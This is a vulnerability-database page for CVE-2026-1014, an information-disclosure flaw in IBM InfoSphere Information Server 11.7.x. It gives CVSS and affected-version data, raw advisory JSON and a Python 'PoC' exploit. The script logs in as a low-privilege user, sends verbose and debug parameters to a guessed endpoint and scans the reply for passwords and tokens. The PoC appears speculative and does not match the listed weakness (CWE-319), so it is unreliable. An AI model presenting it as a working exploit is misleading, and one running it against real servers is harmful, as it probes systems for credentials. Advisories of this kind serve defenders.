Security Vulnerability Report
中文
CVE-2026-1014 CVSS 6.5 MEDIUM

CVE-2026-1014

Published: 2026-03-25 21:16:28
Last Modified: 2026-03-26 18:16:38
Source: [email protected]

Description

IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is vulnerable to exposure of sensitive information via JSON server response manipulation.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
IBM InfoSphere Information Server 11.7.0.0
IBM InfoSphere Information Server 11.7.0.1
IBM InfoSphere Information Server 11.7.0.2
IBM InfoSphere Information Server 11.7.0.3
IBM InfoSphere Information Server 11.7.0.4
IBM InfoSphere Information Server 11.7.0.5
IBM InfoSphere Information Server 11.7.1.0
IBM InfoSphere Information Server 11.7.1.1
IBM InfoSphere Information Server 11.7.1.2
IBM InfoSphere Information Server 11.7.1.3
IBM InfoSphere Information Server 11.7.1.4
IBM InfoSphere Information Server 11.7.1.5
IBM InfoSphere Information Server 11.7.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json def check_cve_2026_1014(target_url, username, password): """ PoC for CVE-2026-1014: IBM InfoSphere Information Server Sensitive Information Disclosure This script attempts to manipulate JSON responses to expose sensitive data. """ session = requests.Session() # Step 1: Authenticate with low-privilege user login_payload = { "username": username, "password": password } try: print("[*] Attempting to login...") login_resp = session.post(f"{target_url}/auth/login", json=login_payload) if login_resp.status_code != 200: print("[-] Login failed.") return print("[+] Login successful.") # Step 2: Send request to vulnerable endpoint with manipulation parameters # Attempting to force verbose error or debug info in JSON response vulnerable_endpoint = f"{target_url}/api/isp/servlet/reports" # Payload designed to manipulate JSON response structure exploit_payload = { "action": "getDetails", "id": "1", "verbose": "true", # Attempting to trigger verbose output "debug": "on" # Attempting to trigger debug mode } print(f"[*] Sending payload to {vulnerable_endpoint}...") response = session.get(vulnerable_endpoint, params=exploit_payload) if response.status_code == 200: try: data = response.json() print("[+] Received JSON response:") print(json.dumps(data, indent=2)) # Check for known sensitive keys in the response sensitive_keys = ["password", "secret", "token", "admin", "internalConfig"] found_keys = [key for key in sensitive_keys if key in str(data).lower()] if found_keys: print(f"[!] Potential sensitive information disclosed: {found_keys}") else: print("[-] No obvious sensitive data found in this attempt.") except ValueError: print("[-] Response was not valid JSON.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target details for testing target = "http://target-infosphere-server:9080" user = "testuser" pwd = "testpass" check_cve_2026_1014(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1014", "sourceIdentifier": "[email protected]", "published": "2026-03-25T21:16:28.123", "lastModified": "2026-03-26T18:16:38.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM InfoSphere Information Server 11.7.0.0 through 11.7.1.6 is vulnerable to exposure of sensitive information via JSON server response manipulation."}, {"lang": "es", "value": "IBM InfoSphere Information Server 11.7.0.0 hasta 11.7.1.6 es vulnerable a la exposición de información sensible a través de la manipulación de la respuesta del servidor JSON."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:infosphere_information_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.7.0.0", "versionEndIncluding": "11.7.1.6", "matchCriteriaId": "65FBF88B-61F0-4D42-A290-453FDC874D7F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7266736", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.